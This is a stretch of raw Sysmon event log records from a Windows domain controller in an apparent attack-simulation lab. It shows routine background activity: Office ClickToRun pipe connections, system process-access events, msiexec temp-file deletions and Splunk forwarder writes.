18141800x800000000000000077908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.951{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.935{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.935{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.935{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.904{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBCF-607E-BE0B-00000000BB01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000077898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.857{A7A01FEF-EBFC-607E-160E-00000000BB01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000077897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.857{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBFC-607E-160E-00000000BB01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.857{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBFC-607E-160E-00000000BB01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000077895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.842{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d08297.rbsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.826{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF7530A01BA80E273D.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000077893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.826{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFDBBFABFB4F6BBE2C.TMPMD5=500E5B37C9A83F4489F7E6CC87BDC102,SHA256=45CD5872F72FA0CD5A5CD3A686A19611A4BA9645B91171F026EF98F245C59A7A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000077892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.826{A7A01FEF-EBCF-607E-C10B-00000000BB01}3984436C:\Windows\system32\conhost.exe{A7A01FEF-EBFC-607E-160E-00000000BB01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.811{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFC-607E-160E-00000000BB01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.811{A7A01FEF-EBCF-607E-BE0B-00000000BB01}68565768C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{A7A01FEF-EBFC-607E-160E-00000000BB01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+3d7ae(wow64)|UNKNOWN(0000000001904853)|UNKNOWN(0000000001904504)|UNKNOWN(00000000019054CE)|UNKNOWN(0000000001902845)|UNKNOWN(0000000001900F66)|UNKNOWN(0000000001900950)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+f036(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+122da(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1859b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1992d7(wow64) 18141800x800000000000000077889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.685{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.389{A7A01FEF-EBFC-607E-150E-00000000BB01}56647024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000077856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.357{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE48388FDA80F7DD22763C9CE0479DC5,SHA256=EE3B088EFD869A33497692C58075009B9A24E1CB420FB7FF1119A72D578DE832,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000077855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.357{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.357{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.357{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.357{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000077851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.357{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8E2A1906A731C075CA414BAFEFA5114F,SHA256=9B9DD55AF82628CB5FF5889CAED5BAD12FD797867605A138895444046BB978AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.357{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5484E9C7CA2E91D269156D67A7ED374F,SHA256=76AA330E9E143691B60AE4AEBFD1E3844A37E869D9541A3F547B0F71D6B405D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.342{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E90C9B6B188B21D6B7B4F5C24DB05B49,SHA256=BB2C33EDBC6CDAD38AC80A6D353583CE1C1DC58070C9A17A3FE5F3308FC56E37,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000077848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.279{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 